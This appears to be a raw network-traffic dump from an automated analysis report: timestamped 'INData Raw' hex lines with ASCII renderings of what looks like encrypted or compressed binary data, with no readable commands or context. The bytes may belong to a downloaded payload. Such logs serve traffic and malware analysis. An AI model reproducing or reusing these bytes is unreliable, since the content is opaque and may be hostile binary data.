                                              Data Ascii: G:QEQhTbSAz-/:*!mE2?2S[8]q<_0jHNckrON;S5zdk(mUpdc0n2kRkfk"2=q16[=*FS: Y&U$1bnZFE:'vh:a0_
                                              2021-12-03 07:24:05 UTC107INData Raw: 6d cd f9 58 18 c4 73 52 21 1b 70 50 83 07 e8 b7 16 92 3c bd ed 84 12 b2 33 04 49 a6 c3 84 30 8a a4 c2 b6 93 fe 32 cd 52 46 f1 96 21 60 6f 8a da 93 3f c8 bc 4f 1a 8f 0b 5b 45 c0 f7 d6 f7 69 d9 5c 7c cc 04 e2 47 07 de bd 81 96 a9 3c bf f3 b2 c9 aa e9 8d 17 a4 d6 6f 04 d7 ec a2 26 d8 58 fc d1 41 40 8a 18 b0 d9 2f fd 61 67 6b fa ba 1f c0 3d 2e 73 1b 8a f8 e0 0d f8 4e 16 99 18 d8 73 e9 c0 35 a3 9e 45 7f 62 f9 60 6a 2d 16 d2 44 a5 1a b2 07 fc 79 57 e7 56 d7 2e cd 96 0a 31 c4 6d 1b 52 5d 05 7e cf c3 49 03 09 e1 b3 1d a9 74 ad e9 63 fd 8b 18 aa 00 4f a5 b8 c9 5c e3 c2 d2 77 8c 20 d8 c3 5c 27 cc c9 5b b6 15 8a 9e 81 e2 7a e3 c5 fd 74 2a 06 b4 95 1b 28 a6 a8 35 10 97 d2 8a 88 5f c1 05 d1 19 9b 8c 2d 99 0f 22 45 cf 6e ea 83 35 2a 63 c3 6c e4 68 4a e3 22 27 31 60 be
                                              Data Ascii: mXsR!pP<3I02RF!`o?O[Ei\|G<o&XA@/agk=.sNs5Eb`j-DyWV.1mR]~ItcO\w \'[zt*(5_-"En5*clhJ"'1`
                                              2021-12-03 07:24:05 UTC108INData Raw: 13 b4 69 09 3d ff 61 c0 14 26 c7 29 c8 4c 97 a7 09 fa 8f 83 c2 cd be a6 ba 46 23 d0 8d d8 c7 f9 c7 15 15 e3 26 15 ba 3c 4b a8 9c 58 84 b8 74 63 09 81 0a 80 d3 4d d3 cd a8 b7 b2 47 41 67 07 42 9c a5 a0 e8 f9 ae 4a 6e 01 4c ca 11 0c dd bc 28 60 5a 99 de 7a 2c 62 e5 ad a4 dd 7e da e5 98 9c 7a 27 bd a4 27 cb 0c 93 d9 38 61 f3 a1 b1 79 3f e9 60 dc 75 6e fb b2 90 57 bb 62 5f 3c 07 86 7a 12 1e e1 36 e3 b4 b0 10 98 b0 c4 a1 60 dc 06 ff 2f 87 c2 86 33 96 5e 6a 58 f1 ad c2 39 1b c6 b0 57 cd 8c 36 4e 79 8e a6 16 fe f7 2d 01 95 11 ea c7 09 37 39 63 6b db 1b ca 54 99 76 ad 8c 03 5d 92 1a 32 02 90 5b 40 e1 9e 25 7a 02 a8 16 2f c7 5c de b6 12 86 fa a1 7f 4a c2 1e 24 16 cc 4c e6 17 c0 2d aa 5b 33 9f cd bc 64 b5 24 7d 79 0a f7 9e 10 3f 5d df 86 0a b8 07 1c 96 fa 9f 02 4d
                                              Data Ascii: i=a&)LF#&<KXtcMGAgBJnL(`Zz,b~z''8ay?`unWb_<z6`/3^jX9W6Ny-79ckTv]2[@%z/\J$L-[3d$}y?]M
                                              2021-12-03 07:24:05 UTC109INData Raw: 38 72 b9 8b da 9d 07 a0 47 a7 8f 8b aa 5d 82 38 e7 d6 f7 69 88 40 6c dd 75 db 3c 09 de d2 d2 9f bf 59 f3 d9 47 c7 8c ed dc 1e 8f d6 6b 06 ed 98 a3 26 de 4e ed d5 db 2f d1 18 bb d3 09 ff 22 69 6a fa b2 16 d6 52 be 71 1b 80 dc f7 07 26 28 14 e2 16 f3 72 ed af dd a0 9e 4f 7f 08 c4 08 94 d2 e9 0c 4a 8d 2d b2 8c f7 51 6f ff 56 dd f0 6e 81 20 37 e2 2c 07 52 5d 05 7e cf c1 5b 03 09 58 04 1c a9 ee 65 e8 63 ae 85 18 aa 16 55 a5 b8 c8 4f d3 c0 c9 6f 85 20 2d c9 5c 27 31 df 50 8c 10 07 b2 96 1c 7a dc ce 96 cd 2a 01 a8 78 1c 15 a2 ab 16 94 92 ca 72 9e fe c4 2e d3 33 6b 80 47 8d 18 33 48 47 05 e6 b8 2d 3b 6c dd 7a ec ff 4d 58 22 26 28 58 4f 99 63 7d fa b1 6f 8c 3a 60 fe eb ce 90 a1 fe b7 9d 31 d1 f1 3b ff ae bf 08 05 df 8c 60 c2 10 a8 4e cd d0 19 b3 31 b2 52 6d 63 85
                                              Data Ascii: 8rG]8i@lu<YGk&N/"ijRq&(rOJ-QoVn 7,R]~[XecUOo -\'1Pz*xr.3kG3HG-;lzMX"&(XOc}o:`1;`N1Rmc
                                              2021-12-03 07:24:05 UTC111INData Raw: 4c ac 56 70 63 0f f0 e0 87 c6 57 d2 d9 bd b8 aa e7 41 cb 0d 6a 8d 4b a0 e2 e4 8e 59 43 ee 4e b9 ac 19 50 b1 24 68 34 36 d8 6b 22 79 b3 ce a0 dd 72 73 fd f3 eb 6e 33 9f 14 21 e0 5e aa 68 57 05 f9 8d b9 26 45 ee 74 f5 8b 6e fc ca 15 da bc 68 30 24 12 92 64 16 91 f0 32 c1 a8 9d e1 9a df 02 b5 ed d1 2e 48 2e 93 dc be 09 24 5a 42 5b dc 1b c4 56 d1 ec 07 5d a2 93 0c 20 8c 7a 48 15 85 1e dd 05 9f 10 d4 af 0d 37 3f 1c ec cf 0f e8 98 e1 76 a7 ae 52 4c 94 7f 5e dc 80 74 45 49 40 29 61 09 92 1b 16 f9 33 89 bc cc 8c 20 8c 75 94 d7 7a 10 21 cc 4c ec 04 c5 05 a0 5e 33 6a c6 94 5c 46 25 77 a7 1a f1 b4 11 39 5d df 85 11 90 02 71 97 fb 93 02 a7 c5 60 cf 62 cf ae e5 15 40 a6 cf 20 c0 39 ee b9 be e5 83 32 dd 75 bf d0 24 e1 e3 fc 94 60 49 fa 42 99 92 6b 7e 0e 70 f6 b0 43 6a
                                              Data Ascii: LVpcWAjKYCNP$h46k"yrsn3!^hW&Etnh0$d2.H.$ZB[V] zH7?vRL^tEI@)a3 uz!L^3j\F%w9]q`b@ 92u$`IBk~pCj
                                              2021-12-03 07:24:05 UTC112INData Raw: d7 6b 0c 84 ab a1 26 da 66 c3 d7 f6 29 be 60 b0 d3 03 f2 18 6f 05 30 bc 16 dc 4d b2 6b 0c ef 2a f6 07 20 7a 3c f0 17 d9 79 e1 a8 9b b0 9b 4f 6f 67 dd 09 94 d8 d0 bb 49 8d 2d 9a 15 f3 51 69 ea 5f f5 e3 c8 80 26 58 f7 2d 07 58 71 09 77 e7 d7 5e 03 0f c9 21 1c a9 7e 68 ea 65 92 4d 1a aa 0a 4a 9d a2 de 20 27 c1 d2 59 a4 37 d9 cb 56 0f 8a dd 50 9b 26 a4 9b 96 1a 14 b7 c7 e5 75 02 34 a0 6b 10 17 a3 a8 2d 18 a8 9b 75 89 73 d2 29 d1 49 4f 8f 56 87 61 e9 43 e5 1e 32 b3 fa 3d b9 de b8 76 67 62 58 23 34 32 5e 4f 8e 77 11 51 a1 7f 9f 7d 0c fc eb ce 6c a8 36 b6 d7 0e df f3 3e c2 0c 86 10 14 d5 84 b6 bf da aa 55 ef cc 08 bb e3 82 b0 7d 69 97 68 58 30 39 6e b8 f6 2e 19 b1 3e 59 23 bc 93 f7 70 94 37 e5 44 8d 46 ed 20 97 c4 93 4f 8e fe 18 ce b4 47 a6 ee 0c f1 b8 6a 4b 85
                                              Data Ascii: k&f)`o0Mk* z<yOogI-Qi_&X-Xqw^!~heMJ 'Y7VP&u4k-us)IOVaC2=vgbX#42^OwQ}l6>U}ihX09n.>Y#p7DF OGjK
                                              2021-12-03 07:24:05 UTC113INData Raw: 30 de 56 a0 cc 73 67 e6 62 89 42 23 9d 89 90 c8 88 0c 67 20 b7 23 bc be 4d 14 fd 7f f4 89 61 e4 a1 78 db 90 6b 57 b3 a4 81 6a 25 ab f2 3d e9 b1 93 fe b6 4e c3 9b e1 ca 01 e5 41 6a d7 92 1d 2a 75 79 59 d9 0a c9 26 2d 10 06 7b d8 8f 14 f6 85 78 4e c7 7b 09 dc 8b 22 29 03 b7 f1 c8 26 5f 6c c4 0f f3 fc 86 6b 59 a5 75 4d 83 16 3b d5 97 a8 f9 b9 65 24 70 09 a1 02 14 f4 5c cf b7 d3 c4 02 8a 53 6c cb 48 ee 11 a3 b0 e7 17 c6 2a c5 a7 32 6c ca d3 b4 44 25 77 6e c0 98 4f 12 25 57 b0 7d 10 88 04 ca 1f e4 dc 11 ac c5 71 c4 7d d9 50 71 ac 51 b0 dc 38 16 30 e3 98 b2 cd 2f 33 dd 7f 4f c7 37 fb cb e6 9a 7f 5f 10 6b 77 81 6c 1b da 60 f6 b6 58 62 e9 3e fb 4b b8 7f 2e 9a 73 b7 68 11 04 c7 f0 d7 f7 64 ae ba e3 07 9f 3d 43 58 55 de cd 1a 04 89 74 4e a9 ef d3 c6 4b 1f 72 f9 dd
                                              Data Ascii: 0VsgbB#g #MaxkWj%=NAj*uyY&-{xN{")&_lkYuM;e$p\SlH*2lD%wnO%W}q}PqQ80/3O7_kwl`Xb>K.shd=CXUtNKr
                                              2021-12-03 07:24:05 UTC114INData Raw: 79 8f 94 ac ac 76 2f 7d 6a 5a 7d 91 18 ff d4 bf 94 23 66 c1 e6 2f db 21 36 0c 5d 13 c2 94 e3 6e 36 e0 f0 97 0e 07 63 65 c9 0c f1 db 2b cd 5f 97 16 08 fa 8f ba a8 84 b2 b2 83 a0 38 f8 75 cf 66 f2 d6 1f 0e b7 75 fa 6d 60 54 81 85 47 ac 47 7b 7c 3a 69 86 ab da 75 12 25 43 5c 85 d2 52 6c 0d 7b 86 ba bf 1c f4 8a 4d 45 e7 5f 1c 86 0c 8a ac fe ed 70 8a da 6a 24 6b ed 4e ab dd 69 73 eb dd 76 6f 1f b7 00 48 37 07 bb 68 3f 0e 05 8c b3 54 68 3e 76 f4 92 7d 21 db 57 d8 bc 68 57 52 ec 93 6e 3c a2 a3 25 e2 a0 89 ea 83 9f 3c b6 c1 d6 05 71 99 9a ce 44 c1 26 5a 75 62 ca 10 c2 28 1a f1 16 a9 cc aa 1f 23 8f 66 8f 80 fd 05 c8 d3 18 3c fc 4a 0f 3b 26 70 6c c4 0f f3 fc 86 50 59 a5 75 7b 9b 07 ee db ef 82 69 d6 98 22 1f f3 bf 1c 01 90 8c dc bc c6 91 26 e4 ae 48 c2 55 57 ec cd
                                              Data Ascii: yv/}jZ}#f/!6]n6ce+_8ufum`TGG{|:iu%C\Rl{ME_pj$kNisvoH7h?Th>v}!WhWRn<%<qD&Zub(#f<J;&plPYu{i"&HUW
                                              2021-12-03 07:24:05 UTC115INData Raw: 31 0b a1 94 93 b9 1d 25 45 91 71 86 16 ba bd ee 0a a7 c2 96 0f cc b2 14 31 94 fa 24 c6 f1 70 f2 87 2d 37 7e 8b da 84 0d dc b8 27 71 55 bc bb 93 4d cd c0 e4 6d 9c 25 7c cc 00 e0 2d 0c c4 43 84 b3 b5 55 39 cf ed c2 8c eb ea 0a a0 d6 7a 03 b0 02 a2 0a db 4d eb fa f9 32 c2 1d b0 c2 0c e0 10 97 6b c3 29 16 d6 52 bc 0a 5e 81 de f3 05 5d 2a 15 e2 12 d1 65 eb 87 86 a0 9e 45 6b 0a b8 4f 95 d2 ed 1a 60 87 2d b2 2c 8b 17 6e e7 52 d4 f6 1b 8d 18 25 ef 2c 07 51 54 df 6d cb c1 59 14 66 e7 07 1c af 09 20 e9 63 f9 96 1c a8 7b 16 a4 b8 cc 7e f1 c2 a9 1a 8d 20 dc dd 54 2e df a4 13 9c 0e 8e b1 a3 1d 7b c5 ce e7 04 69 00 a2 6f cc 09 9c 6b 3e 10 90 c8 0f cc 72 c3 2a c5 3a 71 9f 52 ab 3b 23 41 ef 16 f9 af 5f 6c 62 c9 6a f9 70 19 1b 23 27 3f 35 19 88 75 6e 6e 8a 60 90 01 c2 fe
                                              Data Ascii: 1%Eq1$p-7~'qUMm%|-CU9zM2k)R^]*eEkO`-,nR%,QTmYf c{~ T.{iok>r*:qR;#A_lbjp#'?5unn`
                                              2021-12-03 07:24:05 UTC116INData Raw: a7 bc dc 5b be 02 72 b3 84 a5 ed 19 0e a8 ba 9e 26 d0 81 d5 59 f3 c7 04 19 e8 26 ff 93 b3 45 b9 90 5b 36 7e 61 63 0f 9d 8b 98 c6 5e df d9 ad ae 85 ef bf 66 21 6c a6 29 bf ee e6 ab 5e 57 e3 57 d0 e9 1a 7c bd 3c 4a 44 91 c9 66 28 65 c0 4a 5e dc 54 7b ec 8f 85 6e 22 98 1f d9 ca 2a ac 6c 43 28 f8 8d b7 dc b0 f4 a2 e3 42 7d 2d 39 ad da bc 63 52 24 00 9f 6e 2b b0 fe 39 17 a1 b4 eb 9f 89 fa b6 ed db 19 ef 3d 9e d6 83 16 2a 4c 94 53 f5 39 d3 3f 07 74 2f 46 cd 86 06 f0 94 71 59 0a c2 cb df 05 9f 3f c8 4b 0e 3d 4d 70 7f cf 14 e8 e8 8a 65 aa a4 48 50 89 ee 39 f0 d3 7c 13 9e 9f 25 74 1b 96 06 04 ff 5a c9 31 cb 86 fc 8a 6c 4c d3 59 2e 1f e4 5d e6 17 ca 8f bb 5d 20 6b dd bb 70 52 32 f0 56 1a f7 9f 03 2d 4c d7 91 06 14 13 14 3a 58 9f 02 ad d4 68 d9 f2 e3 a4 61 87 56 29
                                              Data Ascii: [r&Y&E[6~ac^f!l)^WW|<JDf(eJ^T{n"*lC(B}-9cR$n+9=*LS9?t/FqY?K=MpeHP9|%tZ1lLY.]] kpR2V-L:XhaV)
                                              2021-12-03 07:24:05 UTC118INData Raw: 1f 9c bc 4c 99 55 81 c0 d9 5a bd 5f 78 cc 11 e5 2b f7 de 91 86 87 ac 56 2f e0 b7 da 72 ea da 1c b1 fc 71 15 a9 fc b2 23 ca b0 ec f9 f5 38 c2 1d b0 c2 0c e5 e4 68 46 f8 95 14 fd e9 bc 1e d2 80 de fd 6b 05 6c 14 e2 16 d9 73 ed ef e8 82 9e 4f 69 08 c4 08 64 ed b0 24 d9 8d 2d b8 b0 e1 87 e2 cc 56 dd f1 c6 96 27 b9 59 3b dd 41 59 08 55 ed c1 52 1b d1 f9 6a f3 a9 74 6f e4 64 f4 8f 38 a9 02 55 a5 90 2a 4d d3 ca fa bc 8e 20 d2 57 55 30 0b d2 59 8c 0a bb 40 91 36 7b dc f7 e6 7f e8 01 a2 6b e6 04 a4 ae 28 03 95 f2 da 89 73 c3 2e c2 37 67 87 a8 82 22 2c 48 f4 10 66 1c 1d 57 63 c9 6e e4 78 71 5d 22 36 3e 55 a0 88 59 7f 61 88 68 9e 12 c1 f6 67 ef b6 b0 ef ce d9 1f ce ea 12 f7 27 92 19 14 da 91 4e d1 3c ab 4d f6 c1 19 a2 3e 82 98 6d 4f 86 c3 37 28 2e 0b 47 ee 3d 1a 99
                                              Data Ascii: LUZ_x+V/rq#8hFklsOid$-V'Y;AYURjtod8U*M WU0Y@6{k(s.7g",HfWcnxq]"6>UYahg'N<M>mO7(.G=
                                              2021-12-03 07:24:05 UTC119INData Raw: 40 c3 de a8 8b 75 e0 41 61 1a e7 8a a5 a0 e3 e6 b8 4f 58 f8 60 ef 12 1b 56 19 39 7e 4f 9e ce 43 8b 74 cd 57 b1 da 6c 50 1b 98 88 68 24 18 00 27 cb 07 a8 71 29 7e ef a5 95 57 07 e8 d6 e5 87 7e ef a0 ae 79 bc 62 55 15 2e 90 6e 30 95 56 36 e9 aa a1 2c 9d b0 c2 be f9 f3 c5 fc 2e 95 c1 1f 1c 35 5e 6b 41 f9 0a e2 2f 07 62 38 57 cd 87 ae 31 a6 65 4d 05 c2 7c df 05 9f 03 d4 89 0d 37 3f 75 f2 c8 0f e2 f6 8a 57 b6 85 4f 4b 1e 2f 38 dc 81 dc 79 f7 8a 31 64 27 1d 1c 07 f5 48 f6 7f cf 86 fa 9c f2 4d c2 5f 39 05 ee 5d c4 01 d7 a1 95 5b 33 6d 6e ad 46 52 31 69 51 b9 f7 9e 1a 31 75 1c 84 11 8e 15 91 15 fb 9f 03 b4 e6 71 ec 74 d9 22 4f 80 40 b2 77 31 e3 2c e1 9d 9e 46 39 32 d7 61 78 14 27 f0 cd e1 1c 67 4f ee 6b 4f 84 7f 5c 85 61 f6 ba 61 76 86 ec f3 58 be 69 2b a1 bb b4
                                              Data Ascii: @uAaOX`V9~OCtWlPh$'q)~W~ybU.n0V6,.5^kA/b8W1eM|7?uWOK/8y1d'HM_9][3mnFR1iQ1uqt"O@w1,F92ax'gOkO\aavXi+
                                              2021-12-03 07:24:05 UTC120INData Raw: d5 f6 25 0c fa b2 d3 09 fd 32 4e 6f fa b8 3e f2 52 be 7b 33 b1 de f7 0d 1f a5 16 e2 16 cf fe c6 af b3 a0 8d 54 6b 20 e3 0d 94 d4 c1 28 48 8d 27 c1 f4 f7 51 69 f4 42 cc e4 a2 71 21 37 e8 43 e1 50 5d 0f 6d ea fb 55 02 09 e1 17 39 81 93 67 e8 69 71 ad 18 aa 1b 46 b9 a9 d4 5b fb e8 d6 5f 8a 36 55 cc 5c 27 dc cb 44 89 26 29 99 96 16 53 e7 c2 e5 79 3c 29 4a 69 1a 0e b5 a3 2a 38 b8 ce 74 8f 65 4e 29 d3 32 79 9a 42 97 26 81 41 e5 1e c0 82 27 2a 65 df 46 13 70 62 52 0a ce 39 48 54 98 69 7e 4e 88 7b 9b 14 d1 73 ec c4 b6 b1 fa b5 19 35 6d e0 34 e3 1c bd 1c 05 d9 90 98 38 12 a8 5f cd 2d 1b b3 31 b2 d1 6c 63 85 9c 93 39 32 15 64 70 2d 1f 9f 3f d5 24 b6 bb a1 66 80 25 e5 c9 8f 46 e1 67 73 c4 93 4f 3f f5 03 c5 76 7c 84 fb 06 e6 bf d6 8e 94 97 51 bf 07 e0 62 90 37 42 70
                                              Data Ascii: %2No>R{3Tk (H'QiBq!7CP]mU9giqF[_6U\'D&)Sy<)Ji*8teN)2yB&A'*eFpbR9HTi~N{s5m48_-1lc92dp-?$f%FgsO?v|Qb7Bp
                                              2021-12-03 07:24:05 UTC122INData Raw: 49 cd 94 2b 2d da 0c a2 b8 2b 6b e6 a5 a0 45 07 ff 63 eb 91 94 fa 98 8d cb a9 73 4b a7 00 97 71 30 ae f6 36 f8 b7 87 f2 62 b1 ee a9 fc d2 17 f5 41 78 d4 92 11 5a d9 6b 52 d3 03 ad b1 10 ee 0d 38 44 87 0c 2a 8a 6e 4d 02 fd df ce 12 88 e9 fd 66 08 21 2a 76 61 dc 18 e2 e6 8e 69 ab 5a 58 71 9b 28 4c dd 80 7e 77 db 8d 32 70 1e a9 0b f9 fe 70 dd a4 df 91 fc 9a 68 55 c9 a1 39 3a dc 5d e3 3f d6 2f aa 5d 09 1a cc bc 64 59 29 6e 6e 1a e6 89 0f 39 a3 de ab 05 99 13 62 5e fa 9f 06 b6 d6 48 d3 60 cf a8 63 8c 5f ae c6 37 c0 29 e2 96 9c 1b 38 1e d2 64 44 c1 31 7e 7c c8 c8 9f b0 11 75 70 83 7c 74 37 76 ed 4e 48 4b 8f 92 6a 4b b2 6a 32 95 6b a0 79 0b 0c f1 04 28 da 43 c7 ab e4 2f b2 2b 44 41 57 e9 c6 1a 1f aa 5b b0 a8 c9 fa 26 24 e5 73 e6 d0 89 79 78 5b f5 27 ec b3 5d 3a
                                              Data Ascii: I+-+kEcsKq06bAxZkR8D*nMf!*vaiZXq(L~w2pphU9:]?/]dY)nn9b^H`c_7)8dD1~|up|t7vNHKjKj2ky(C/+DAW[&$syx[']:
                                              2021-12-03 07:24:05 UTC123INData Raw: 86 f2 49 8d 2b a1 09 e7 5f 11 ab 57 dd f4 dc 8f 08 2b ec 2c 01 41 56 76 5c cd c3 5d 10 19 f0 15 14 c6 5c 67 e8 65 ec 97 09 a6 28 78 a0 b8 ce 67 fd c2 d2 59 a4 cc da cb 56 48 f9 dd 50 9b 1f 9a 88 9d 34 56 ca c7 e3 57 04 03 a2 6d 32 e8 a6 bf 34 7f b6 c8 74 8f 62 d3 2d bc 18 7a 8e 50 85 1f 32 2e fd 15 e8 a1 fc 25 46 e1 59 fb 72 68 4b 36 0f 03 48 5e 83 ab 6a 77 aa 68 4d 01 cd ef e1 d5 a1 8e 9b 5f f2 e2 df f5 23 3f 27 82 08 10 ce 90 3e 67 2f 43 a8 1a 3b 1f 99 3b db 52 6c 63 8f b0 8e 28 7d 01 4c f7 25 1f 99 29 06 23 b6 bb b2 72 94 31 d7 6a 8f 47 eb 4f ef c4 0e 45 2c ef 7f d8 62 54 a6 fd 06 e0 a6 5b 89 94 8d 50 ab 12 ef 7a 3a 37 18 7b 85 ec 6f 15 07 60 26 f7 9a 70 3a 2e f4 e9 ea a2 1a ac 94 48 f1 f9 13 bd 46 8a c2 e7 82 08 07 ab ee 91 b7 46 c9 e4 ad e3 d9 51 19
                                              Data Ascii: I+_W+,AVv\]\ge(xgYVHP4VWm24tb-zP2.%FYrhK6H^jwhM_#?'>g/C;;Rlc(}L%)#r1jGOE,bT[Pz:7{o`&p:.HFFQ
                                              2021-12-03 07:24:05 UTC124INData Raw: cb ec db 02 d5 2e 80 e6 96 1b df 5e 6a 52 d1 1a c2 28 13 10 12 1a cd 86 0e 22 f8 44 59 11 ee a2 a1 04 95 13 fe 9a 43 37 39 60 57 db 0f e2 fd b1 76 a6 a4 53 20 ef 11 38 d8 83 6a 96 d7 88 db 71 05 b8 30 2a fd 5f 50 0b b1 06 fd 8b 7b 48 c0 24 b8 17 cc 48 ce 4f c2 2d a0 26 4c 6d cc b8 67 50 27 06 06 1b f7 9a 12 5e dd de 87 15 a0 ef 1e 12 f1 9b 16 59 c4 76 31 63 c4 a9 5c ad 42 b7 5b 97 bd ba f4 89 b2 e7 3b 49 5f 74 50 d4 0c a8 c9 f7 9b 1d ce ef 6a 5f 94 7d 76 5d e0 f7 b0 4d 65 fd 6e f8 4b b6 48 d2 8b 78 bd 7c 0e e5 ef 18 28 da 63 d5 96 a6 05 9c a0 f3 3a fb cc c6 1e 17 80 11 34 a9 c3 c7 e9 7c e7 73 f3 a6 19 6f 78 4e e7 2e e3 36 df 17 1a 24 d0 c7 03 a0 ab 72 98 d7 71 c7 73 85 9d 90 e0 af ba 1e f3 e5 81 59 87 9f e1 4d b8 68 73 a7 02 d8 9e 79 93 b1 5b c5 26 4b 8c
                                              Data Ascii: .^jR("DYC79`WvS 8jq0*_P{H$HO-&LmgP'^Yv1c\B[;I_tPj_}v]MenKHx|(c:4|soxN.6$rqsYMhsy[&K
                                              2021-12-03 07:24:05 UTC125INData Raw: 79 bf 90 e5 4d d3 c6 f8 05 f2 b9 d9 cb 58 3b 47 fa 7d 96 28 96 86 a6 03 77 e7 ea e7 7f 2c 2b f8 15 83 05 a4 bb 23 8a b5 e7 7f af 6e dc 12 cc 3d 50 a3 54 83 08 08 1b 9b 8d e9 ab 26 34 f9 ec 43 f0 54 7c 47 69 38 36 60 73 8b 75 6c 4c c2 01 02 13 c7 fa f4 cd 2c 95 c3 ad 2b 02 c7 ff 6c f6 38 bf 34 07 df 80 9a b2 6e 31 54 e5 c0 06 b9 a1 bf 4b 60 45 90 ba 91 4c 31 0a 64 da 2c 1f 9f 03 06 5d 2f ba a0 76 8b 3a 57 4f a2 4d cd 50 e4 db fc 5c 04 c2 10 d9 64 7e ce 81 9f e1 a9 5f 96 98 0d 75 86 1f d2 55 3f 28 30 65 99 c4 47 16 07 77 0e 93 e6 ff 54 cf f1 f6 ed 27 60 b2 93 6c f9 9b 3b 32 46 80 c8 fe a0 bc 2a a9 e4 bf fb 29 b7 77 a1 90 fb 4f 17 55 e1 e6 43 aa 4f 5f 79 8d e6 02 e1 95 4d b6 bb 3e 97 fd 9f 37 9a 57 b0 93 57 4c 86 aa 79 54 5e 5b 9f 1c c0 41 41 95 0f 72 a0 ce
                                              Data Ascii: yMX;G}(w,+#n=PT&4CT|Gi86`sulL,+l84n1TK`EL1d,]/v:WOMP\d~_uU?(0eGwT'`l;2F*)wOUCO_yM>7WWLyT^[AAr
                                              2021-12-03 07:24:05 UTC127INData Raw: ce 0f e6 e8 af ec 82 89 57 7b 8d 26 18 50 82 7e 68 ce b6 08 72 0f b8 36 6d 81 c5 df bc c8 99 cb 11 5a 67 cc 79 27 21 ec c2 e4 17 c0 34 82 76 31 6c ca 96 0e 38 bc 7c 79 1e e8 a6 8a 00 70 d1 a1 0e b0 22 8d 10 fb 9f 19 8f e8 62 cf 64 e5 c4 0e 19 41 b3 d1 3f f9 a2 d0 a4 b8 c3 26 0b fd e3 52 d0 24 ec e3 da 93 60 49 c4 00 25 09 6a 74 22 7e cc 2a 6c 4a 88 ca e6 71 92 fc 3d 89 78 aa 51 37 19 ee 08 fc b1 11 44 bb e1 03 86 15 de 62 52 c3 e0 05 2e a2 c9 b2 a8 c3 da e9 09 e7 73 ff f1 f4 10 e1 4b e2 3c fe 71 c6 33 37 2f f4 a3 bb 81 0d 74 b0 3a 6c ce 51 aa 9a 1e 51 f8 56 61 6a e0 83 5f e3 24 7a 68 91 4e 0d ba 3f f2 4c fe 92 b1 48 c7 0b 49 9f fb 4b 47 91 41 71 9d 04 45 5c c2 db 45 d2 d9 cb de e4 c3 51 09 28 66 78 a4 07 93 bf 3d f8 46 4b 71 86 16 a7 80 0f 6c 8b cc b4 07
                                              Data Ascii: W{&P~hr6mZgy'!4v1l8|yp"bdA?&R$`I%jt"~*lJq=xQ7DbR.sK<q37/t:lQQVaj_$zhN?LHIKGAqE\EQ(fx=FKql
                                              2021-12-03 07:24:05 UTC128INData Raw: 55 dc 4b f3 a6 7c 8e 56 9f 26 0f 43 e5 12 c2 c5 5c b3 62 c9 6a e4 14 f8 7d 0f 28 1d 57 38 a9 ef 6e 66 a0 60 8b 3a ea fc eb c2 9c da 90 38 0c 1d ca ff 53 73 11 ba 17 23 c0 e1 90 7a 14 a8 55 fe ec 34 b1 3b 9c 4c 02 1d 16 b1 8e 2c 31 69 d6 d2 03 10 bf 36 30 03 19 bf a0 72 8b 3e e5 47 8d 46 ed 65 85 ba 0a 44 2c eb 0d b0 f8 71 81 f1 20 ff c0 7b 37 90 97 50 b0 3b d9 48 33 31 68 14 fb 75 6b 14 03 6e 4e 67 bd 4b 5a e9 ea 83 c0 7e 41 9f 9c 55 c3 be 36 be 46 86 e2 8f d4 0d 06 ab e0 a6 ba dd ec c3 af b6 e0 3b 39 27 c0 cb 4c 93 5b 79 74 17 e6 04 cb e4 39 07 97 3c 93 e4 d9 c3 c1 e3 be b5 4c 3f a9 c3 58 79 51 62 95 3b cd e1 41 93 25 07 cc 7f 2c db 23 3a 69 d8 0e fc 91 c5 60 50 df b8 6c 0f 2b 6e 4e ed 16 27 d5 17 b2 25 26 01 09 fe 9a cb 73 b2 94 bd b4 b4 49 f0 85 cb 4a
                                              Data Ascii: UK|V&C\bj}(W8nf`:8Ss#zU4;L,1i60r>GFeD,q {7P;H31huknNgKZ~AU6F;9'L[yt9<L?XyQb;A%,#:i`Pl+nN'%&sIJ
                                              2021-12-03 07:24:05 UTC129INData Raw: c0 2b 80 d9 4d f5 cd bc 60 66 b4 7d 79 1a 6d bb 3d 34 7b ff 16 11 88 02 3c 6b fc 9f 02 bd ed 4d cd 62 c9 84 f2 fe d9 b2 d5 24 e0 aa f5 89 b6 7f 1c 1f cc 53 70 42 24 f0 cb d7 ec 67 4f ee 72 73 bd 69 74 20 4b 74 ce d0 66 86 e8 d9 d8 b2 60 3f 13 5d 9a 68 3c 3b 7d 0e d6 db 4f a2 bd e1 07 84 06 69 45 7f cb ec 98 6b 1b 6b b0 ac e3 57 c1 24 e5 e9 dc f6 8b 48 58 de e2 38 e1 6d da 11 1a 20 cc 94 aa a3 ab 70 9a b8 0d 5e 78 87 9c 3e c2 d2 3c 1f 69 c4 ae 4a da 39 75 4d bc 40 0b 2b 05 d2 e3 eb ba 9c 5d ef 20 61 1d 83 f8 2c ef dc 50 0b 00 5a 62 c2 db 45 cd d9 f4 76 c4 73 53 29 a7 76 50 89 12 bb 94 15 92 3e f8 f2 f8 8b b9 bf 91 69 31 c2 92 18 8c 80 ef ad 99 da b3 c7 8c 35 d3 17 2e 1d 7e 91 f2 ba 3f d9 be 72 f2 2b 25 4d 93 49 fc 4e f7 68 a4 d6 58 e1 11 c6 1c 91 df bd 85
                                              Data Ascii: +M`f}ym=4{<kMb$SpB$gOrsit Ktf`?]h<;}OiEkkW$HX8m p^x><iJ9uM@+] a,PZbEvsS)vP>i15.~?r+%MINhX
                                              2021-12-03 07:24:05 UTC130INData Raw: b6 c4 23 73 84 cf e0 30 c9 8c 97 19 05 45 a3 9d c1 36 88 ed e5 c4 19 93 8e 92 66 6c 79 a7 9d 8c 28 28 2b ce 89 b7 1e 99 2d 78 9a b6 bb a0 e8 b1 1c dc 4c af ff eb 4f ef e4 2a 4d 2c ef 05 f1 4f 56 ac f9 2c 62 d7 c2 88 94 93 70 11 13 f4 4a a9 12 6f 6b a3 cc d0 14 07 71 04 47 90 66 55 d5 dd c4 e2 bd 43 b5 1e 34 7f 97 1b b8 66 3b c8 e1 aa 0e 22 86 f5 9f f1 fc c9 ee a0 b0 41 58 19 cf d8 e3 61 8e 50 57 73 93 98 9b e0 8a 43 be 2a 3c 97 fb 2f 7c c9 dc 97 b3 ef 53 89 30 7c bd 59 7d 80 0c ed cb 6c 97 0f 6b 98 60 53 42 26 25 00 62 96 d1 9f e3 e5 18 d2 a2 4f 2f 96 72 66 c0 34 f6 db 3d dc 44 a4 28 24 f8 85 a3 c3 15 c7 2b 93 ab 23 f0 35 ce 4a fe 5d 30 39 e6 14 21 2c 9f 4b a8 b6 a0 a4 56 70 79 27 ba 85 87 d5 67 54 a7 25 a2 9a e0 61 d8 0d 